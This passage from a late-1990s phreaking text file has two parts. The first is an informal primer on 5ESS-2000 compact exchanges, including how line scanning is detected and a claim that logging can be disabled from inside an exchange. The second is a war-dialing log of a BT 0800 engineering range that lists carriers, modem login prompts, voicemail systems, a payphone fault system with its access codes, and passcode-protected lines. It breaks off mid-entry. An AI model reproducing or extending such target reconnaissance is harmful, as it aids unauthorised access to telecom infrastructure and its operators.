  1543. This is a very compact file, designed to be an intorduction, or primer to
  1544. 5ESS local compact digital exchange units. I am wrtting this off the top of
  1545. my head, so don't expect it to be very complex in technical nature. For
  1546. starters I'll explain a little about the new 5ESS switches and there
  1547. functions. We've all heard of the millenium bug, and it's supposid ability to
  1548. take out massive networks etc. Well Lucent technologys, Bellcore (now
  1549. telecord communications or somthing), aswell as lata exchange carrier
  1550. providers such as MCI, AT&T, Sprint, and all the RBOC's such as SWBell, etc,
  1551. all got a bit paranoid and decided to enhance to current 5ESS switching
  1552. configurations to a new architecture they feel would be compatable with the
  1553. millenium software and network problems. The new 5ESS-2OOO switches are all
  1554. basically the same as conventional 5ESS switches, except the software parts,
  1555. such as the administration control software platforms, and global title
  1556. translation software etc, have been upgraded to be Y2K compatable. As well
  1557. as this, the new 5ESS switches have been modified (based upon conventional
  1558. 5ESS) to be easily upgraded in the future with new modules for future
  1559. telecommunications developments. In other words, the new digital switches are
  1560. very very very souped-up versions of 5ESS, infact, I would concider them to
  1561. be one of the most versatile switches around. Now the deal with these new
  1562. digital switching systems is that they can handle more and more lines, more
  1563. network traffic, aswell as a very upgraded ability for general system
  1564. capacity. They have also been upgraded with new security features to stop
  1565. people like me from gaining access to the local administration part which
  1566. is accessable via x25, the PSTN, and the net (on a 'secret' IP range).. I'm
  1567. not going to go into that at the moment, thats another file.. Anyways, as I
  1568. was saying, the new 5ESS-2OOO digital exchanges are like souped up 5ESS
  1569. switches. Before there where people bitching about how they can get 'traced'
  1570. messing around on the phone network because 5ESS logs shit. Well, I got news
  1571. for you, 99.9% of all worldwide switching mechanisms, electro-mechanical, or
  1572. digital derived, ALL log stuff, and always have done. It's just with these
  1573. new 5ESS-2OOO digital exchanges, its more obvious if you are messing around.
  1574. Lets say for example you where scanning over 400 numbers a night via your
  1575. land line.. Normaly a 5ESS, DMS, TXE etc would just log your line usuage,
  1576. calling patterns etc into a subscriber log in one of the switches sub-system
  1577. parts. You would only usually get discovered if one of the field technitions,
  1578. glanced at the data for you line usuage. Thats ok, because we all no that
  1579. exchange field operators are lame and lazy, but what about this new 5ESS-
  1580. 2OOO line loging equipment? - welp, I have bad news for you. If you scan
  1581. in continuous, or repetitive cycles over your subscriber loop, the chances
  1582. are, you're gonna get your haxoring ass taken to court by your RBOC, or
  1583. whatever provider you are with. The reason for this is that 5ESS-2OOO
  1584. digital switches continously monitor the activity, and network usuage of over
  1585. 100,000 lines similtaniously. Instead of loging line status etc into a
  1586. dormant log file in a sub-system, if one of the local switches notices that
  1587. somthings up, a field adminstrator is notified imediatly, probably by the
  1588. means of a status bar on an uplinked terminal. The new switches have been
  1589. modified to be very stringent on system capacity and usuage patterns, and
  1590. will notify any field office engineer of the slightest problem. The new 5ESS-
  1591. 2OOO switches are basically like UK monologs, in other words, they record
  1592. everything about your line, all digits dialed, even after terminating
  1593. destination point, they even log the time intervals between each tone you
  1594. dial/emit. Basically they are the big-bro of the phone system so start
  1595. getting paranoid. (I know for a fact, that it is possible to log onto one of
  1596. the local exchange units and turn line logging OFF, and even make your line
  1597. appear to be non-existant). Anhow, I think I've probably made a few people a
  1598. little paranoid now, on with the rest of the file.
  1599.  
  1600. Types of local compact digital exchanges
  1601. ----------------------------------------
  1602.  
  1603. Werd, well now its time for the focus of the file. I'm not writting a mad
  1604. big file on the entire 5ESS-2OOO network because it would take _ages_, so
  1605. I'm going to focus on local compact excahnges designed for the rurual
  1606. community such as college campuses and areas with not many subscribers, like
  1607. suberban areas of towns. There are 2 main types of compact 5ESS-2OOO local
  1608. switch, the CDX (Compact Digital eXchange), and the VCDX (Very Compact
  1609. Digital eXchange). Both these new units are designed to be very echonimacal
  1610. for the money raking telcos. The idea is that these switches are being placed
  1611. in new suberban housing developments, and are being integrated into the PSTN
  1612. as we speak. The CDX digital exchange for example is designed to be very
  1613. snall, handeling small local phone networks, it can however be upgraed with
  1614. the implementation of modules, kind of like plug'n'play, until the switch
  1615. becomes a fully fledged 5ESS-2OOO unit if required in the future. Lets take
  1616. a look at these local networks in more detail.
  1617.  
  1618. The CDX digital exchange
  1619. ------------------------
  1620.  
  1621. The CDX (Compact Digital eXchange) is a small sized siwtch configuration,
  1622. which is capable of providing the same services to subscribers the same as
  1623. a conventional 5ESS switch would. Unlike the older rural exchange units,
  1624. these new switches are capable of handeling more advanced telecommunications
  1625. services like wideband data transmission, and video data etc. The switch is
  1626. housed in a cabinet that is 6 foot high, 29.9 inches wide, and 23.6 inches
  1627. deep. The switch is desinged to be a stand alone unit and as I said before,
  1628. very capable of handeling current/future telecommunications developments and
  1629. serverices such as POTS lines (Plain Old Telephone Service), equal access
  1630. services, ISDN (Integrated Services Digital Network), CENTREX services such
  1631. as call waiting, hold, etc etc. The system is also designed to be fully
  1632. compatable with the Signaling System 7 telephony protocol which has been
  1633. implemented over the majourity of the international PSTN. The switch can
  1634. handle from 100 subscriber loops, upto 15,000 local access lines or 15,000
  1635. remote access lines. CDX operates on the same software as the conventional
  1636. 5ESS-2OOO switch, and also has the same call routing architecture (physical).
  1637.  
  1638.  
  1639.          ______________________  Admin Console     AM:   Adminstration Module
  1640.         |                      |        ______     CM2:  Communications Module
  1641.         |                      |       |      |    CM2C: " Compact
  1642.         |        3B21D         |-------|      |    MSDT: SLC-2OOO Multi -
  1643.         |                      |       |______|          Services Remote
  1644.         |______________________|                         Module
  1645.                    |
  1646.                    |
  1647.                    |                    _________________
  1648.                    |                   |                 |
  1649.             _______|_______            |      SM or      |--|
  1650.            |               |           |      SM-2OOO    |--|
  1651.            |      CM2C     |-----------|                 |--| (upto 6 RSM
  1652.            |_______________|           |                 |--|  outputs)
  1653.                    |                   |                 |--|
  1654.                   /                    |_________________|
  1655.                 /                               |
  1656.               /                                 |
  1657.       _______|_______                     ______|______          _________
  1658.      |               |                   |             |        |         |  
  1659.      |      ORM      |                   |             |--------|  local  |
  1660.      |_______________|                   |_____________|        |_________|
  1661.                                                                   | | | |
  1662.                                ORM: Remote Module
  1663.                                RSM: Remote Switching Module
  1664.                                SLC: Subscriber Loop Carrier
  1665.                                SM:  Switching Module
  1666.  
  1667. The VCDX digital exchange
  1668. -------------------------
  1669.  
  1670. VCDX stands for (VERY Compact Digital eXchange), and when I say compact, I
  1671. mean compact. It is the smallest of all 5ESS-2OOO switch configurations but
  1672. is still very capable of providing the same services as its bigger bro, the
  1673. CDX switch. This switch is used by CATV, CAPS, small towns, and government
  1674. facilitys. The switch is also capable of providing Central Office services
  1675. such as the usual call waiting, and ISDN. The intersting thing about this
  1676. switch is that it supports Carrier Identification Code (CIC) expansion and
  1677. is compatable with changing NPA's in the Interchangable Numbering Plan Area,
  1678. as required by reglatory bodys such as the FCC.
  1679.  
  1680. The VCDX switch can support various configurations using a single 5ESS
  1681. Switching Module (SM) to handle the call processing. The SM is controlled by
  1682. a sophisticated UNIX software-based workstation which provides administrative
  1683. and maintenance capabilities. A mimimum configuration of 2 cabinets that are
  1684. 6 foot high x 29.9 inches wide x 23.6 inches deep in size is necessary and
  1685. thus it fits in a small space. If left in standard mode, the VCDX can handle
  1686. upto 1,500 lines. If the SM-2OOO unit is impemented as a module, the switch
  1687. can handle as many as 14,000 lines.
  1688.  
  1689.                  _____________                  _______
  1690.                 |             |                |       |
  1691.                 | workstation |----------------| modem |      
  1692.                 |_____________|                |_______|
  1693.                                                    |
  1694.                                                    |
  1695.                                                    |
  1696.                                          __________|___________
  1697.              _____________              |                      |--|
  1698.             |             |             |                      |--|
  1699.             | local dist  |-------------|     SM or SM-2OOO    |--|
  1700.             |_____________|             |                      |--|
  1701.                | | | | |                |______________________|--|
  1702.  
  1703.           (to local distrobution plant. then to subscriber loops.)
  1704.  
  1705. Conclusion
  1706. ----------
  1707.  
  1708. Welp, thats it for this short file/article. Hope you enjoyed it. As you can
  1709. see the 5ESS lcoal unit range is very complex, and is a massive improvement
  1710. on previous local switching networks. Just be carefull about the subscriber
  1711. loop monitoring modules. If you'd like more info on 5ESS-2OOO switching, I
  1712. have put some decent information up on my website for your enjoyment and
  1713. viewing pleasure. Goto http://www.dtmf.org/hybrid and check it out, you'll
  1714. also be able to find the other 30+ files I've written in the past on there
  1715. aswell, so go there now@! thats an order, heh. Anyways, thats it, peace.
  1716.  
  1717.  [http://darkcyde.system7.org] [http://dtmf.org/hybrid] [http://system7.org]
  1718.            [http://phunc.com] [http://ninex.com] [http://b4b0.org]
  1719.  
  1720. shouts to [9x] [b4b0] [D4RKCYDE] [subz] [gr1p] [t1p] [ph1x] [downt1me] [euk]
  1721.           [lowtek] [digiphreq] [zomba] [force] [psyclone] [pbxphreak] [gb]
  1722.           [ch1ckie] [knight] [siezer] [oeb] [barby] [jasun] [pvbbs] [nino]
  1723.  
  1724. hybrid@dtmf.org
  1725. #darkcyde efnet
  1726. -------------
  1727.  
  1728.  
  1729. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  1730. -->]OO[:[ O8OO672[XXX] ]::::::::::::::[OO--[ by faith ]---[ ]::::::::::::::::
  1731. -->[OO]:::::::::::::::::::::::::::::::[ http://darkcyde.system7.org ]::::::::
  1732.  
  1733.  
  1734. *******************************
  1735. Scan of BT engineering exchange
  1736. 0800 672 {xxx} 1999
  1737. *******************************
  1738.  
  1739. 000 not recognised
  1740. 001 BT paging service (24hrs)
  1741. 002 - 019 nr
  1742. 020 "******* messaging service - who are you calling please" :)
  1743. 021 - 066 dead tone
  1744. 067 BT pagaing (24hrs) some freaky woman i couldn't understand
  1745. 068 - 099 nr
  1746. 100 carrier
  1747. 101 ringing
  1748. 102 residential BT accounts service
  1749. 103 carrier
  1750. ****************************************************************************
  1751. 104 costiomer service management centre edinborough network service
  1752. provision control function has changed isdn 30 provision stage 1 look check
  1753. 0800282212 isdn30 deta configeration and commisioning press 2 or dial 
  1754. 0800 592 831 isdn 2  provision assistance dial 3 for keep on dial 4
  1755. **MARIDIAN**
  1756. ****************************************************************************
  1757. 105 costomer servie amnaggement centre ed costomer repair enq 1 cch issues 3
  1758. escilation enq 4 **meridian**
  1759. 106 ringing
  1760. 107 carrier
  1761. 108 ringing
  1762. 109 dead tone
  1763. 110 weird scottishj voice
  1764. 111 - 114 dead tone
  1765. 115 please leave a message after the tone - maridian   } someone cant spell
  1766. 116 ringing
  1767. 117 retail sales
  1768. 118 - 119 ringing
  1769. 120 dead tone
  1770. 121 some bloke
  1771. 122 ringing
  1772. 123 dead tone
  1773. 124 prsonal answer phone
  1774. 125 dead tone
  1775. 126 "hello"
  1776. 127 ringing
  1777. 128
  1778. 129
  1779. 130 carrier
  1780. ***********************************************************************
  1781. 131 CSX RAM2000 system 1 to sign on - 2 to sign off
  1782. 132 welcome to the BT payroll please enter you BT employee ID number
  1783. ***********************************************************************
  1784. 133 this number has moved
  1785. 134 ringing
  1786. 135 carrier
  1787. 136 dead tone
  1788. 137 nr
  1789. 138 ringing
  1790. 139 carrier
  1791. 140 north of england AMU
  1792. 141 - 143 dead tone
  1793. 144 BT info line
  1794. 145 carrier
  1795. 146 operator
  1796. 147 carrier
  1797. 148 HR & DS????
  1798. 149 carrier
  1799. 150 - 158 dead tone
  1800. 159 ringing
  1801. 160 sincorta???? help desk
  1802. 161 nr
  1803. 162 dead tone
  1804. 163 employment law policy helpline
  1805. 164 - 168 regia help desk
  1806. 169 ringing
  1807. 170 strange ring
  1808. 171 - 174 ringing
  1809. 175 dead tone
  1810. 176 wolverhampton SMC
  1811. 177 ? SMC
  1812. 178 - 179 ringing
  1813. 180 - 189 regia help desk
  1814. 190 - 191 carrier
  1815. 192 ringing
  1816. 193 carrier
  1817. 194 engaged
  1818. 195 - 196 carrier
  1819. 197 dead tone
  1820. 198 ringing
  1821. 199 dead tone
  1822. 200 ringing
  1823. 201 - 206 carrier
  1824. 207 - 213 ringing
  1825. 214 carrier
  1826. 215 - 218 ringing
  1827. 219 rec managers centre edinborough????
  1828. 220 summit direct is closed
  1829. 221 some bloke
  1830. 222 service centre???
  1831. 223 this number has ceased
  1832. 224 some woman
  1833. 225 ringing
  1834. 226 engaged
  1835. 227 - 229 service centre
  1836. 230 dead tone
  1837. 231 - 232 BT residential sales + accounts service
  1838. 233 BT touchpoint helpdesk
  1839. 234 engaged
  1840. 235 dead tone
  1841. 236 ringing
  1842. 237 - 238 dead tone
  1843. 239 engaged
  1844. 240 - 249 regia
  1845. 250 - 254 ringing
  1846. 255 dead tone
  1847. 256 ringing
  1848. 257 dead tone
  1849. 258 BT ACP Team
  1850. 259 carrier
  1851. 260 some bloke
  1852. 261 dead tone
  1853. 262 nr
  1854. 263 ringing
  1855. 264 carrier
  1856. 265 BT Corparate and government accounts
  1857. 266 ringing
  1858. 267 regia
  1859. 268 carrier
  1860. 269 - 271 ringing
  1861. 272 - 275 BT payphone???
  1862. 276 dead tone
  1863. 277 some bloke
  1864. 278 - 279 ringing
  1865. 280 dead tone
  1866. **************************************************************************
  1867. 281 please enter your 3 digit channel #, if you require a list of channel
  1868. #'s please enter 999;
  1869. **************************************************************************
  1870. 282 ringing
  1871. 283 dead tone
  1872. 284 - 289 ringing
  1873. 290 carrier
  1874. 291 - 292 visa international automated referal service
  1875. 293 - 299 carrier
  1876. 300 dead tone
  1877. 301 - rang.
  1878. 302 - BT & cellnet tag-team, on holdiday, answer phone.
  1879. 303 - rang.
  1880. 304 - 
  1881. 305 - 
  1882. 306 - 
  1883. 307 - rang.
  1884. 308 - took time to get through, just rang.
  1885. 309 - rang.
  1886. 310 - fucking neat-o. VMB? some kinda technical centre.
  1887. 311 - rang!
  1888. 312 - 0800 990088
  1889. 313 - 0800 990088
  1890. 314 - 0800 990088
  1891. 315 - rang.
  1892. 316 - 0800 990088
  1893. 317 - 
  1894. 318 - pair allocation help desk
  1895. 319 - rang.
  1896. 320 - rang.
  1897. 321 - 
  1898. 322 - 
  1899. 323 - BT residensal customer account service
  1900. 324 - --------======================++++++ENGAGDED+++++================---
  1901. 325 - 
  1902. 326 - rang
  1903. 327 - rang
  1904. 328 - CARRIER!
  1905. 329 - rang
  1906. 330 - rang
  1907. 331 - rang
  1908. 332 - rang
  1909. 333 - fax
  1910. 334 - fax/modem
  1911. 335 - 
  1912. 336 - 
  1913. 337 - 
  1914. 338 - 
  1915. 339 - 
  1916. 340 - rang
  1917. 341 - ---------------============+++ENGAGDED+++============--------------
  1918. 342 - ---------------============+++ENGAGDED+++============--------------
  1919. 343 - voice
  1920. 344 - BT business something, voice.
  1921. 345 - rang
  1922. 346 - rang
  1923. 347 - 
  1924. 348 - 
  1925. 349 - 
  1926. 350 - 
  1927. 351 - 
  1928. 352 - 
  1929. 353 - BT residensal repair service
  1930. 354 - 
  1931. 355 - 
  1932. 356 - 
  1933. 357 - rang
  1934. 358 - BCS-3 Meridian Mail system  BCS ;)
  1935. 359 - rang, then answer phone
  1936. 360 - reck-care? help desk. options
  1937. 361 - reck-care? help desk. options
  1938. 362 - reck-care? help desk. options
  1939. 363 - reck-care? help desk. options
  1940. 364 - reck-care? help desk. options
  1941. 365 - reck-care? help desk. options
  1942. 366 - reck-care? help desk. options
  1943. 367 - reck-care? help desk. options
  1944. 368 - reck-care? help desk. options
  1945. 369 - reck-care? help desk. options
  1946. 370 - 
  1947. 371 - rang
  1948. 372 - rang
  1949. 373 - rang
  1950. 374 - rang
  1951. 375 - rang
  1952. 376 - rang
  1953. 377 - rang
  1954. 378 - 
  1955. 379 - rang
  1956. 380 - 
  1957. 381 - 
  1958. 382 - 
  1959. 383 - rang
  1960. 384 - 
  1961. 385 - 
  1962. 386 - 
  1963. 387 - 
  1964. 388 - 
  1965. 389 - 
  1966. 390 - 
  1967. 391 - help desk for something
  1968. 392 - rang
  1969. 393 - carrier
  1970. 394 - 
  1971. 395 - london product support centre. talking machine.
  1972. 396 - rang
  1973. 397 - really bad answer machine for something on BT?
  1974. 398 - rang
  1975. 399 - 
  1976. 400 - someone stevenson VMB.
  1977. 401 - fax
  1978. 402 - rang
  1979. 403 - rang
  1980. 404 - rang
  1981. 405 - 
  1982. 406 - 
  1983. 407 - rang
  1984. 408 - rang
  1985. 409 - rang
  1986. 410 - voice
  1987. 411 - BT something solutions help desk
  1988. 412 - 
  1989. 413 - rang
  1990. 414 - voice
  1991. 415 - rang
  1992. 416 - really bad answer phone
  1993. 417 - really bad answer phone
  1994. 418 - rang
  1995. 419 - answer phone
  1996. 420 - rang
  1997. 421 - rang
  1998. 422 - rang
  1999. 423 - rang
  2000. 424 - rang
  2001. 425 - rang
  2002. 426 - rang
  2003. 427 - rang
  2004. 428 - rang
  2005. 429 - rang
  2006. 430 - BT national meridian help service
  2007. 431 - BT residensal customer accounts
  2008. 432 - rang
  2009. 433 - 
  2010. 434 - BT residensal customer accounts
  2011. 435 - BT direct debit customers account
  2012. 436 - BT residensal customer accounts
  2013. 437 - 
  2014. 438 - voice
  2015. 439 - rang
  2016. 440 - rang
  2017. 441 - rang
  2018. 442 - rang
  2019. 443 - rang
  2020. 444 - fax
  2021. ***************************
  2022. 445 - BT mcp credit control
  2023. ***************************
  2024. 446 -
  2025. 447 - 
  2026. 448 - rang
  2027. 449 - rang
  2028. 450 - rang
  2029. 451 - rang
  2030. 452 - rang
  2031. 453 - rang
  2032. 454 - rang
  2033. 455 - pual bowshure VMB
  2034. 456 - rang
  2035. 457 - rang
  2036. 458 - rang
  2037. 459 - rang
  2038. 460 - 
  2039. 461 - BT service management
  2040. 462 - edinbough service manager
  2041. 463 - voice
  2042. 464 - voice
  2043. 465 - voice
  2044. 466 - voice /*same voice i think, poor bastard, it just gone 02:01am */
  2045. 467 - bt local government?
  2046. 468 - BT 24hour.... /*cut him off*/
  2047. 469 - rang
  2048. 470 - rang
  2049. 471 - voice
  2050. 472 - rang
  2051. 473 - rang
  2052. 474 - rang
  2053. 475 - rang
  2054. 476 - BT residentsal customer account service
  2055. 477 - 
  2056. 478 - rang
  2057. 479 - fax
  2058. 480 - voice
  2059. 481 - rang
  2060. 482 - voice
  2061. 483 - BT VOICE MESSAGING.
  2062. 484 - answer machine telecom sales desk
  2063. 485 - answer machine telecom sales desk
  2064. 486 - answer machine telecom sales desk
  2065. 487 - answer machine telecom sales desk
  2066. 488 - answer machine telecom sales desk
  2067. 489 - answer machine telecom sales desk
  2068. 490 - rang
  2069. 491 - rang
  2070. 492 - rang
  2071. 493 - forwards to a VMB, but can not access(no suscibe)
  2072. 494 - rang
  2073. 495 - rang
  2074. 496 - rang
  2075. 497 - rang
  2076. 498 - rang
  2077. 499 - rang
  2078. 500 - rang
  2079. 501 - fax
  2080. 502 - fax
  2081. 503 - fax
  2082. 504 - fax
  2083. 505 - fax
  2084. 506 - fax
  2085. 507 - fax
  2086. 508 - fax
  2087. 509 - fax
  2088. 510 - 
  2089. 511 - voice. a party?
  2090. 512 - answer phone
  2091. 513 - rang
  2092. 514 - answer phone
  2093. 515 - answer phone
  2094. 516 - answer phone
  2095. 517 - answer phone
  2096. 518 - answer phone
  2097. 519 - rang
  2098. 520 - 
  2099. 521 - 
  2100. 522 - 
  2101. 523 - rang
  2102. 524 - 
  2103. 525 - Concert VNS. card and pin #
  2104. ***************************************************
  2105. 526 - FUCKING INTERESTING   (dialtone)
  2106. ***************************************************
  2107. 527 - rang
  2108. 528 - BT customer service centre
  2109. 529 - BT service management
  2110. 530 - BT national meridian operation centre
  2111. 531 - 
  2112. 532 - 
  2113. ***************************************************
  2114. 533 - HAHAHAH THE NAME GAME NUMBER
  2115. ***************************************************
  2116. 534 -
  2117. 535 - 
  2118. 536 - 
  2119. 537 - BT something or another
  2120. 538 - BT sincordless solutions
  2121. 539 - 
  2122. 540 - 
  2123. 541 - 
  2124. 542 - BT residensal customer account service
  2125. 543 - fax
  2126. 544 - 
  2127. 545 - rang
  2128. 546 - fax
  2129. 547 - voice
  2130. 548 - rang
  2131. 549 - rang
  2132. 550 - Hillsdown help desk, OPtions
  2133. 551 - fax
  2134. 552 - BT phoneBook supply
  2135. 553 - rang
  2136. 554 - work manager edinbough
  2137. 555 - work manager edinbough
  2138. 556 - work manager edinbough
  2139. 557 - work manager edinbough
  2140. 558 - rang
  2141. 559 - more work manager stuff
  2142. 560 - rang
  2143. 561 - telecom sales desk
  2144. 562 - telecom sales desk
  2145. 563 - telecom sales desk
  2146. 564 - telecom sales desk
  2147. 565 - telecom sales desk    } they supply BT with hardware
  2148. 566 - telecom sales desk
  2149. 567 - telecom sales desk
  2150. 568 - telecom sales desk
  2151. 569 - telecom sales desk
  2152. 570 - 
  2153. 571 - cambridge service management centre
  2154. 572 - 
  2155. 573 - cambridge service management centre
  2156. 574 - cambridge service management centre
  2157. 575 - cambridge service management centre
  2158. 576 - cambridge service management centre
  2159. 577 - cambridge service management centre
  2160. 578 - cambridge service management centre
  2161. 579 - cambridge service management centre
  2162. 580 - rang
  2163. 581 - cambridge service management centre
  2164. 582 - 
  2165. 583 - cambridge service management centre
  2166. 584 - cambridge service management centre
  2167. 585 - cambridge service management centre
  2168. 586 - cambridge service management centre
  2169. 587 - voice
  2170. 588 - cambridge service management centre
  2171. 589 - edinbrough service management centre
  2172. 590 - rang
  2173. 591 - edinbrough service management centre
  2174. 592 - cambridge service management centre
  2175. 593 - rang
  2176. 594 - 
  2177. 595 - rang
  2178. 596 - 
  2179. 597 - fax
  2180. 598 - fax
  2181. 599 - fax
  2182. 600 - BT security 0800321999 * nasty *
  2183.  
  2184. Rang        = boring fucking wankers
  2185. 0800 990088    = whats the fucking point?
  2186. neat-o        = werd (oh fuck, tell i been using IRC!)
  2187. the nothings    = bollox, just fucking bollox. 
  2188. other        = god gave us the phone for something, and it aint phone
  2189.             shags
  2190. carrier        = YERRR.
  2191. voice        = I hate getting though to voice, always phreaks me! :)
  2192. -------------------------------------------------------------------------------
  2193.  
  2194. 0800-672-328 
  2195.  
  2196. User Access Verification
  2197.  
  2198. Login:guest
  2199. Password:
  2200.  
  2201.  
  2202. % Authentication failed.
  2203.  
  2204. ===============================================================================
  2205. 0800-672-393
  2206. WARNING:   You are about to access a
  2207. controlled system. You are required to
  2208. have a personal authorisation to use this
  2209. system and you are strictly limited to the
  2210. use set out in that written authorisation.
  2211. Unauthorised access to or misuse of this
  2212. system is prohibited and constitutes an
  2213. offence under the Computer Misuse Act 1990.
  2214. Only proceed if you are authorised to use
  2215. this system as detailed above.
  2216.  
  2217.  
  2218. 02:Login:
  2219. ===============================================================================
  2220.  
  2221. 0800 672 600    [BT security. 0800 321 999]
  2222. 0800 672 601    [dead]
  2223. 0800 672 602    [modem/fax]
  2224. 0800 672 603    [modem/fax]
  2225. 0800 672 604    [no answer]
  2226. 0800 672 605    [no answer]
  2227. 0800 672 606    [strange, no ring then internal dead tone]
  2228. 0800 672 607    [same]
  2229. 0800 672 608    [dead]
  2230. 0800 672 609    [internal dead tone]
  2231. 0800 672 610    [BT residential customer accounts service, recording]
  2232. 0800 672 611    [dead]
  2233. 0800 672 612    [BT residential customer accounts service]
  2234. 0800 672 613    [dead]
  2235. 0800 672 614    [dead]
  2236. 0800 672 615    [no answer]
  2237. 0800 672 616    [dead]
  2238. 0800 672 617    [dead]
  2239. 0800 672 618    [no answer]
  2240. 0800 672 619    [no answer]
  2241. 0800 672 620    [re-routed, cell-phone?]
  2242. 0800 672 621    [re-routed, cell-phone?]
  2243. 0800 672 622    [re-routed, cell-phone?]
  2244. 0800 672 623    [re-routed, cell-phone?]
  2245. 0800 672 624    [re-routed, cell-phone?]
  2246. 0800 672 625    [re-routed, cell-phone?]
  2247. 0800 672 626    [re-routed, cell-phone?]
  2248. 0800 672 627    [re-routed, cell-phone?]
  2249. 0800 672 628    [re-routed, cell-phone?]
  2250. 0800 672 629    [re-routed, cell-phone?]
  2251. 0800 672 630    [re-routed, cell-phone?]
  2252. 0800 672 631    [re-routed, cell-phone?]
  2253. 0800 672 632    [re-routed, cell-phone?]
  2254. 0800 672 633    [dead]
  2255. 0800 672 634    [dead]
  2256. 0800 672 635    [London Meridian Operations Center. Meridian Mail, hehe.
  2257. 0800 672 636    [BT voice messaging, *massive* voicemail network.login number]
  2258. 0800 672 637    [BT voice messaging, leave a message number]
  2259. 0800 672 638    [no answer]
  2260. 0800 672 639    [no answer]
  2261. 0800 672 640    [dead]
  2262. 0800 672 641    [dead]
  2263. 0800 672 642    [dead]
  2264. 0800 672 643    [no answer]
  2265. 0800 672 644    [dead]
  2266. 0800 672 645    [dead]
  2267. 0800 672 646    [dead]
  2268. 0800 672 647    [dead]
  2269. 0800 672 648    [dead]
  2270. 0800 672 649    [dead]
  2271. 0800 672 650    [re-routed, BT somthing, stupid bitch is to quiet, ans-phone]
  2272. 0800 672 651    [re-routed, Corpertate line service center, answerphone]
  2273. 0800 672 652    [no answer]
  2274. 0800 672 653    [BT customer service center, recording]
  2275. 0800 672 654    [BT local goverment]
  2276. 0800 672 655    [no answer]
  2277. 0800 672 656    [no answer]
  2278. 0800 672 657    [no answer]
  2279. 0800 672 658    [BT local government]
  2280. 0800 672 659    [no answer]
  2281. 0800 672 660    [telecoms sales desk recording]
  2282. 0800 672 661    ["]
  2283. 0800 672 662    ["]
  2284. 0800 672 663    ["]
  2285. 0800 672 664    ["]
  2286. 0800 672 665    ["]
  2287. 0800 672 666    ["]
  2288. 0800 672 667    ["]
  2289. 0800 672 668    ["]
  2290. 0800 672 669    ["]
  2291. 0800 672 670    [no answer]
  2292. 0800 672 671    [very strange, emits a tone, responds to DTMFs]
  2293. 0800 672 672    [no answer]
  2294. 0800 672 673    [dead]
  2295. 0800 672 674    [dead]
  2296. 0800 672 675    [modem/fax]
  2297. 0800 672 676    [no answer]
  2298. 0800 672 677    [no answer]
  2299. 0800 672 678    [not recognised]
  2300. 0800 672 679    [modem/fax]
  2301. 0800 672 680    [dead]
  2302. 0800 672 681    [BT number information line, * 2 digit passcode..]
  2303. 0800 672 682    [dead]
  2304. 0800 672 683    [no answer]
  2305. 0800 672 684    [no answer]
  2306. 0800 672 685    [busy]
  2307. 0800 672 686    [no answer]
  2308. 0800 672 687    [no answer]
  2309. 0800 672 688    [not recognised]
  2310. 0800 672 689    [no answer]
  2311. 0800 672 690    [dead]
  2312. 0800 672 691    [BT number information unit]
  2313. 0800 672 692    [dead]
  2314. 0800 672 693    [no answer]
  2315. 0800 672 694    [no answer]
  2316. 0800 672 695    [no answer]
  2317. 0800 672 696    [no answer]
  2318. 0800 672 697    [no answer]
  2319. 0800 672 698    [no answer]
  2320. 0800 672 699    [dead]
  2321. 0800 672 700    [modem/fax]
  2322. 0800 672 701    [re-routed, ans phone, * 3 digit sec code]
  2323. 0800 672 702    [dead]
  2324. 0800 672 703    [dead]
  2325. 0800 672 704    [dead]
  2326. 0800 672 705    [no answer]
  2327. 0800 672 706    [dead]
  2328. 0800 672 707    [Cellnet callback mesaging service]
  2329. 0800 672 708    ["]
  2330. 0800 672 709    [no answer]
  2331. 0800 672 710    [no answer]
  2332. 0800 672 711    ["hi, Birmingham"]
  2333. 0800 672 712    [BT network services]
  2334. 0800 672 713    [not rec]
  2335. 0800 672 714    [not rec]
  2336. 0800 672 715    [CIST]
  2337. 0800 672 716    [not rec]
  2338. 0800 672 717    [modem]
  2339. 0800 672 718    [not rec]
  2340. 0800 672 719    [no answer]
  2341. 0800 672 720    [no answer]
  2342. 0800 672 721    [dead]
  2343. 0800 672 722    [no answer]
  2344. 0800 672 723    [somthing managment center]
  2345. 0800 672 724    [no answer]
  2346. 0800 672 725    [dead]
  2347. 0800 672 726    [not rec]
  2348. ************************************************************************
  2349. 0800 672 727    [BT payphone automatic fault reporting system. For BT
  2350.                  engineer dudes to request maintanance etc on payphones,
  2351.                  requires 2 digit code (11) also fault code (10) etc]
  2352. ************************************************************************
  2353. 0800 672 728    [no answer]
  2354. 0800 672 729    [BT buisness connections]
  2355. 0800 672 730    [Telecom red sales desk]
  2356. 0800 672 731    ["]
  2357. 0800 672 732    ["]
  2358. 0800 672 733    ["]
  2359. 0800 672 734    ["]
  2360. 0800 672 735    ["]
  2361. 0800 672 736    ["]
  2362. 0800 672 737    ["]
  2363. 0800 672 738    ["]
  2364. 0800 672 739    ["]
  2365. 0800 672 740    [no answer]
  2366. 0800 672 741    [not rec]
  2367. 0800 672 742    [dead]
  2368. 0800 672 743    [no answer]
  2369. 0800 672 744    [no answer]
  2370. 0800 672 745    [no answer]
  2371. 0800 672 746    [no answer]
  2372. 0800 672 747    [no answer]
  2373. 0800 672 748    [no answer]
  2374. 0800 672 749    [no answer]
  2375. 0800 672 750    [no answer]
  2376. 0800 672 751    [dead]
  2377. 0800 672 752    [answerphone]
  2378. 0800 672 753    [dead]
  2379. 0800 672 754    [production control team]
  2380. 0800 672 755    [dead]
  2381. 0800 672 756    [modem/fax]
  2382. 0800 672 757    [dead]
  2383. 0800 672 758    [not rec]
  2384. 0800 672 759    [no answer]
  2385. 0800 672 760    [dead]
  2386. 0800 672 761    [BT residential repair service]
  2387. 0800 672 762    [performance somthing]
  2388. 0800 672 763    [dead]
  2389. 0800 672 764    [dead]
  2390. 0800 672 765    [dead]
  2391. 0800 672 766    [dead]
  2392. 0800 672 767    [dead]
  2393. 0800 672 768    [dead]
  2394. 0800 672 769    [dead]
  2395. 0800 672 770    [BT buisness center]
  2396. 0800 672 771    [no answer]
  2397. 0800 672 772    [Cellnet direct]
  2398. 0800 672 773    [0800 550 811 - changed]
  2399. 0800 672 774    [modem/fax]
  2400. 0800 672 775    [dead]
  2401. 0800 672 776    [no answer]
  2402. 0800 672 777    [HR and DS]
  2403. 0800 672 778    [BT residential repair service]
  2404. 0800 672 779    [direct to some womans Meridian Mail vmb. *81]
  2405. 0800 672 780    [no answer]
  2406. ************************************************************************
  2407. 0800 672 781    [HR and DS - !WARNING! - this is strange, on both these
  2408.                  numbers it is not possible to terminate your call.
